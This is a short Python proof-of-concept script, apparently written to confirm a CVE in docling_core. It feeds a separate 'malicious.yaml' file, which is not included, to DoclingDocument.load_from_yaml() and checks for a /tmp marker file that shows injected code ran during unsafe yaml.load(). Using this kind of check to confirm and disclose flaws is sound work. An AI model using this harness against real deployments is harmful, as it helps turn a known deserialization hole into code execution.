from pathlib import Path
import os
from docling_core.types.doc import DoclingDocument

yaml_path = Path("malicious.yaml")
marker = Path("/tmp/docling_cve_poc_marker")

if marker.exists():
    marker.unlink()

print(f"[+] Loading YAML via DoclingDocument.load_from_yaml(): {yaml_path}")

try:
    DoclingDocument.load_from_yaml(yaml_path)
    print("[!] load_from_yaml returned without error")
except Exception as e:
    # This is expected: payload executes during yaml.load(),
    # then DoclingDocument.model_validate(...) fails because the parsed object
    # is not a valid DoclingDocument dictionary.
    print(f"[+] load_from_yaml raised (expected for this PoC): {type(e).__name__}")
    print(f"    {str(e).splitlines()[0]}")

print(f"[+] Marker exists? {marker.exists()}")
if marker.exists():
    print(f"[+] Marker content: {marker.read_text().strip()}")